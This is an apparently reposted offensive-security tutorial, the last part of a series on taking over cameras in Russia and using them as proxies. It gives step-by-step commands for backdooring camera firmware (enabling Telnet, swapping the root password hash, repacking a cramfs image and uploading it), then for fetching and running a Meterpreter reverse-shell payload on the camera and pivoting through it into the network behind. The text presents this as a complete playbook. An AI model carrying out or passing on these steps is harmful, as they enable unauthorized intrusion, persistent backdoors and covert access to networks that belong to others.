National Cyber Warfare Foundation (NCWF)

Network Espionage – Using Russian Cameras as Proxy, Part 3
0 user ratings		2025-09-16 14:31:06
milo
Red Team (CNA)

Welcome back, cyberwarriors. Hope you’re enjoying the series so far. Today we are wrapping it up with the final part, focused on modifying camera firmware. This is the most advanced and risky method. It takes time and precision. The biggest challenge is finding firmware that’s suitable for editing and compiling back without breaking the device. […]


The post Network Espionage – Using Russian Cameras as Proxy, Part 3 first appeared on Hackers Arise.











Welcome back, cyberwarriors.





Hope you’re enjoying the series so far. Today we are wrapping it up with the final part, focused on modifying camera firmware. This is the most advanced and risky method. It takes time and precision. The biggest challenge is finding firmware that’s suitable for editing and compiling back without breaking the device. Every manufacturer uses specific formats, so if you mess up the structure or file system, the camera won’t boot again. Always proceed carefully.

















Case 4: Modifications





This case is similar to the previous one, but we are going deeper. Imagine the camera you found does not have any ports open, like SSH or Telnet – and neither is configurable in the settings. At first glance, it looks like a dead end.









Translation: Обновление прошивки — Firmware update
Browse… No file selected. OK








But then you discover it allows firmware updates. Most cameras have this feature available from the web dashboard. That’s your way in. The first step is to get a copy of the firmware. You can find it on third-party firmware archives or from the official manufacturer’s website.





After downloading the firmware, extract it. We found a script file named run.sh inside. When we opened it, we noticed something interesting.

















The script had a Telnet launch command that was commented out. We removed the comment to enable Telnet

















That solves one part. But we don’t know the Telnet password that is hashed in the passwd file. By default you can find this file in the /etc directory:

















Instead of cracking the existing password hash, we generate our own:





kali > openssl passwd -1 password

















This gives a new hash string. Replace the existing hash in the /etc/passwd file with the one you just generated. Save the changes.

















Now you need to repack the entire directory structure into a new firmware file. Create a new directory and move everything into it:





kali > mkdir firmware





kali > mv etc firmware/





And so on, until you move all other directories.





Recompiling





Our firmware was using the cramfs (Compressed ROM File System). You’ll need to install cramfs tools directly from the Ubuntu repo, as it is not available for Kali.





Here is the link where you can find it:





http://ftp.ubuntu.com/ubuntu/ubuntu/pool/universe/c/cramfs/





Let’s download it:





kali > wget http://ftp.ubuntu.com/ubuntu/ubuntu/pool/universe/c/cramfs/cramfsprogs_1.1-6ubuntu1_amd64.deb

















kali > sudo dpkg -i cramfsprogs_1.1-6ubuntu1_amd64.deb

















Once installed, create the new firmware image:kali > mkcramfs firmware  firmware-x.cramfs

















Rename the file to match the original firmware name to avoid upload issues. We named it firmware to clear the view and make it easier to understand. Go back to the camera dashboard and upload the modified firmware.









Translation: Обновление прошивки — Firmware update
Browse… firmware-x.cramfs OK








Wait a few minutes for it to flash and reboot. To check if it’s back online:





kali > ping





Once the camera responds, connect via Telnet:





kali > telnet 23

















Log in using root and the password you created. If successful, you’ll be inside the system. In our case, the target already had nc installed, which helped a lot.

















Payload Execution





Determine the architecture of the system:





target > uname -m





Create the payload on Kali:





kali > msfvenom -p linux//meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf

















Host the payload on your Kali machine:





kali > python3 -m http.server





Then download it to the target:





target > curl -O http://:8000/shell.elf





target > chmod +x shell.elf





target > ./shell.elf





Open Metasploit on Kali, set up multi/handler with the same payload options, and you’ll get a Meterpreter session. From there, use proxychains with a SOCKS proxy to route your traffic through the compromised camera and access the network behind it. All of these steps were covered in the previous parts.





Conclusion





Modifying camera firmware is the most advanced step in gaining persistent access. It allows you to create a custom backdoor even when all ports are closed. The method gives full control, but it also comes with the highest risk. A small mistake and the camera is dead. But if done right, it’s a powerful tool for deeper infiltration. With this final part, you now have a complete playbook for hacking, accessing, and using Russian cameras as proxies in espionage operations. Good luck on your next hunt.

The post Network Espionage – Using Russian Cameras as Proxy, Part 3 first appeared on Hackers Arise.



Source: HackersArise
Source Link: https://hackers-arise.com/network-espionage-using-russian-cameras-as-proxy-part-3/

Comments
new comment
Nobody has commented yet. Will you be the first?
  
Forum
Red Team (CNA)


Copyright 2012 through 2025 - National Cyber Warfare Foundation - All rights reserved worldwide.